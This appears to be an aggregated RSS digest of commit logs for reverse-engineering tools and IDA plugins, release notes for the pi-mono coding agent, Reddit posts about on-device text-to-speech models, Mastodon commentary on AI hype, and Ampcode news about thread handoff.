- c73c09ce: Merge remote-tracking branch 'origin/GP-6299_Dan_fixHungUI-take2'
- 49c9a724: GP-6299: New approach ()
- 2c99fbe7: Revert "GP-6299: Bail from getPreviousLayout if there are no layouts."
- e3dc18ee: Merge remote-tracking branch 'origin/GP-6299_Dan_fixHungUI'
- b3424594: GP-6176: Forgot to make Objc2TypeMetadata getters
- 36bdaab8: Merge remote-tracking branch
- 425577a0: Merge remote-tracking branch
- bb725c1b: Merge remote-tracking branch 'origin/patch'
- 1789bb9c: GP-1 minor doc fix
- 75b1172a: Merge remote-tracking branch 'origin/GP-6298_Dan_fixSnapshotIsNull' i…
- 00f6e14c: Merge remote-tracking branch 'origin/GP-6316_SleighUnique256' into patch
- 5cac537c: Merge remote-tracking branch 'origin/GP-6314_CrossbuildLocalLabels' i…
- ida-chat-plugin
- 2442297c: Improve status bar and header UI
- 4492a4a8: Add rich markdown rendering to CLI
- 8b162e3a: added video
- e4a2a555: Update installation docs with GitHub URL and hcli version note
- ca56dc4f: 0.2.4
- 7a1aac84: Fix release workflow to allow updating existing releases
- f8dd360a: 0.2.3
- ee743756: 0.2.2
- 74194ad7: Revert to claude-code-transcripts dependency
- 9e24a136: Fix release workflow dependency conflict
- f2801da4: Disable PyPI publishing in release workflow
- a3e86d21: Improve release workflow and documentation
- 315e016d: Refactor transcript export and update dependency to claude-code-log
- 9db294f9: Add README with screenshots, untrack local config files
- d7289a56: Add share button to export chat as HTML
- 5ef089e3: Fix text wrapping in code/output bubbles
- 25040b7d: Revert "Make chat bubbles responsive with 80% max width"
- c3a0a86e: Make chat bubbles responsive with 80% max width
- 7d53cd5b: Fix MessageHistory API calls in core module
- c87223fc: Add transcript command for HTML generation
- ida-domain
- ida-hcli
- c0759c0e: 0.15.8
- 55b7e645: feat: add GitHub URL support for plugin install (#138)
- 12bf8daf: docs: add CHANGELOG.md covering releases since 0.14.1
- 43faa183: 0.15.7
- b8ab7dd1: fix: plugin: correct status message nesting during dependency install…
- 3c0b0f99: 0.15.6
- 89b63a66: feat: improve error message when IDA version detection fails
- 24624916: 0.15.5
- cb8b176c: plugin: settings: accept prompt=False to hide settings with a default
- IDAPluginList
- 404b8542: chore: Auto update IDA plugins (Updated: 19, Cloned: 0, Failed: 0)
- IDApy_FunctionStringAssociate
- 66123401: Added support for IDA 9 SDK with minor optimizations
- msc-thesis-LLMs-to-rank-decompilers
- febb8a8a: update for desktop
- patcherex
- 9457abf3: Update cfg_utils.detect_syscall_wrapper. (#65)
- quokka
- rhabdomancer
- sharingan
- 4a74be30: format module deadif
- symless
- ca1a96ef: Symless 1.1
-
🔗 badlogic/pi-mono v0.45.7 release
-
🔗 r/LocalLLaMA Soprano TTS training code released: Create your own 2000x realtime on-device text-to-speech model with Soprano-Factory! rss
Hello everyone! I’ve been listening to all your feedback on Soprano, and I’ve been working nonstop over these past three weeks to incorporate everything, so I have a TON of updates for you all!
For those of you who haven’t heard of Soprano before, it is an on-device text-to-speech model I designed to have highly natural intonation and quality with a small model footprint. It can run up to 20x realtime on CPU, and up to 2000x on GPU. It also supports lossless streaming with 15 ms latency, an order of magnitude lower than any other TTS model. You can check out Soprano here:
Github: https://github.com/ekwek1/soprano
Demo: https://huggingface.co/spaces/ekwek/Soprano-TTS
Model: https://huggingface.co/ekwek/Soprano-80M
Today, I am releasing training code for you guys! This was by far the most requested feature to be added, and I am happy to announce that you can now train your own ultra-lightweight, ultra-realistic TTS models like the one in the video with your own data on your own hardware with Soprano-Factory! Using Soprano-Factory, you can add new voices, styles, and languages to Soprano. The entire repository is just 600 lines of code, making it easily customizable to suit your needs.
In addition to the training code, I am also releasing Soprano-Encoder, which converts raw audio into audio tokens for training. You can find both here:
Soprano-Factory: https://github.com/ekwek1/soprano-factory
Soprano-Encoder: https://huggingface.co/ekwek/Soprano-Encoder
I hope you enjoy it! See you tomorrow, - Eugene
Disclaimer: I did not originally design Soprano with finetuning in mind. As a result, I cannot guarantee that you will see good results after training. Personally, I have my doubts that an 80M-parameter model trained on just 1000 hours of data can generalize to OOD datasets, but I have seen bigger miracles on this sub happen, so knock yourself out :)
submitted by /u/eugenekwek
-
🔗 badlogic/pi-mono v0.45.6 release
Added
- `ctx.ui.custom()` now accepts `overlayOptions` for overlay positioning and sizing (anchor, margins, offsets, percentages, absolute positioning) (#667 by @nicobailon)
- `ctx.ui.custom()` now accepts `onHandle` callback to receive the `OverlayHandle` for controlling overlay visibility (#667 by @nicobailon)
- Extension example: `overlay-qa-tests.ts` with 10 commands for testing overlay positioning, animation, and toggle scenarios (#667 by @nicobailon)
- Extension example: `doom-overlay/` - DOOM game running as an overlay at 35 FPS (auto-downloads WAD on first run) (#667 by @nicobailon)
-
🔗 badlogic/pi-mono v0.45.5 release
Fixed
- Skip changelog display on fresh install (only show on upgrades)
-
🔗 badlogic/pi-mono v0.45.4 release
Changed
- Light theme colors adjusted for WCAG AA compliance (4.5:1 contrast ratio against white backgrounds)
- Replaced `sharp` with `wasm-vips` for image processing (resize, PNG conversion). Eliminates native build requirements that caused installation failures on some systems. (#696)
Added
- Extension example: `summarize.ts` for summarizing conversations using custom UI and an external model (#684 by @scutifer)
- Extension example: `question.ts` enhanced with custom UI for asking user questions (#693 by @ferologics)
- Extension example: `plan-mode/` enhanced with explicit step tracking and progress widget (#694 by @ferologics)
- Extension example: `questionnaire.ts` for multi-question input with tab bar navigation (#695 by @ferologics)
- Experimental Vercel AI Gateway provider support: set `AI_GATEWAY_API_KEY` and use `--provider vercel-ai-gateway`. Token usage is currently reported incorrectly by Anthropic Messages compatible endpoint. (#689 by @timolins)
Fixed
- Fix API key resolution after model switches by using provider argument (#691 by @joshp123)
- Fixed z.ai thinking/reasoning: thinking toggle now correctly enables/disables thinking for z.ai models (#688)
- Fixed extension loading in compiled Bun binary: extensions with local file imports now work correctly. Updated `@mariozechner/jiti` to v2.6.5, which bundles babel for Bun binary compatibility. (#681)
- Fixed theme loading when installed via mise: use wrapper directory in release tarballs for compatibility with mise's `strip_components=1` extraction. (#681)
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release ## New plugins - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin) (1.0.0) -
🔗 HexRaysSA/plugin-repository commits ida-chat-plugin rss
ida-chat-plugin -
🔗 @cxiao@infosec.exchange regarding the "inevitability" of technology: mastodon
regarding the "inevitability" of technology:
-
🔗 @cxiao@infosec.exchange RE: [https://dair- mastodon
RE: https://dair-community.social/@emilymbender/115888462372987312
very good essay. it's not my job to test AI for you by shoving AI into my life and work no matter what.
and to turn the "wishful thinking" frame around too, it's actually AI boosters that are engaging in the wishful thinking: of a magical universal technology that can be deployed regardless of whether it's actually solving any problems
none of this technology is inevitable
-
🔗 HexRaysSA/plugin-repository commits sync repo: ~3 changed rss
sync repo: ~3 changed No plugin changes detected -
🔗 r/LocalLLaMA My wishes for 2026 rss
Which do you think will happen first? And which won’t happen in 2026? submitted by /u/jacek2023
-
🔗 r/reverseengineering Floxif File Infector Analysis with Binary Ninja rss
submitted by /u/jershmagersh
-
🔗 r/LocalLLaMA kyutai just introduced Pocket TTS: a 100M-parameter text-to-speech model with high-quality voice cloning that runs on your laptop—no GPU required rss
Blog post with demo: Pocket TTS: A high quality TTS that gives your CPU a voice: https://kyutai.org/blog/2026-01-13-pocket-tts
GitHub: https://github.com/kyutai-labs/pocket-tts
Hugging Face Model Card: https://huggingface.co/kyutai/pocket-tts
arXiv:2509.06926 [cs.SD]: Continuous Audio Language Models, Simon Rouard, Manu Orsini, Axel Roebel, Neil Zeghidour, Alexandre Défossez: https://arxiv.org/abs/2509.06926
From kyutai on 𝕏: https://x.com/kyutai_labs/status/2011047335892303875
submitted by /u/Nunki08
-
🔗 badlogic/pi-mono v0.45.3 release
No content.
-
🔗 badlogic/pi-mono v0.45.2 release
Fixed
- Extensions now load correctly in compiled Bun binary by using jiti for module resolution with proper alias handling
-
🔗 badlogic/pi-mono v0.45.1 release
Changed
- `/share` now outputs `buildwithpi.ai` session preview URLs instead of `shittycodingagent.ai`
-
🔗 badlogic/pi-mono v0.45.0 release
Added
- MiniMax provider support: set `MINIMAX_API_KEY` and use `minimax/MiniMax-M2.1` (#656 by @dannote)
- `/scoped-models`: Alt+Up/Down to reorder enabled models. Order is preserved when saving with Ctrl+S and determines Ctrl+P cycling order. (#676 by @thomasmhr)
- Amazon Bedrock provider support (experimental, tested with Anthropic Claude models only) (#494 by @unexge)
- Extension example: `sandbox/` for OS-level bash sandboxing using `@anthropic-ai/sandbox-runtime` with per-project config (#673 by @dannote)
-
🔗 Ampcode News Handoff, Please rss
Up until now, you had to click a button or trigger a command to handoff when your thread became too long or you had finished a task.
Now you can just ask the agent:
- After implementing a feature: "Handoff and build an admin panel for this"
- After fixing a bug: "Handoff and check if this issue exists elsewhere"
- After planning: "Handoff to implement the plan"
The agent starts a new thread with the relevant context and keeps working.

-
🔗 Ampcode News Stick a Fork in It, It's Done rss
We're ripping out the Fork command.
We added thread forking back in July 2025 (now ancient, primordial history) as a way to conveniently share context for branching experiments or side quests in Amp.
Today we have better ways of sharing context between threads: handoff and thread mentions, which treat threads as first-class stores of context.
Perhaps there is a great potential UX out there for `fork`, but we want Amp to be simple as well as powerful. We'd rather spend our time perfecting `handoff` and `thread mentions` than support `fork`.
Handoff
Handoff is great for extracting useful context from your thread for the next goal at hand. This means you can start a new thread with only the necessary context.
- Use `thread: handoff` from the command palette.
- Prompt your task and a new thread will be started with the necessary context already in the prompt.
Thread Mentions
Thread mentions let you pull information from other threads into your current thread. You can reference multiple threads, merging context from many sources.
- Use `thread: new` and then use the `enter` shortcut to start a new thread with a reference to the main thread.
- Or, use `@@` to search for the thread you want to pull context from.
- Once you run your prompt, Amp will read the threads and extract context pertinent to your task.
Managing Threads
Using new threads as branches leads to many threads, often running in parallel. To manage them:
- use `thread: switch to previous` or `thread: switch to parent` to return to the main thread.
- use the `thread: map` to get a bird's-eye view and easily navigate back to the main thread (CLI only for now).
-







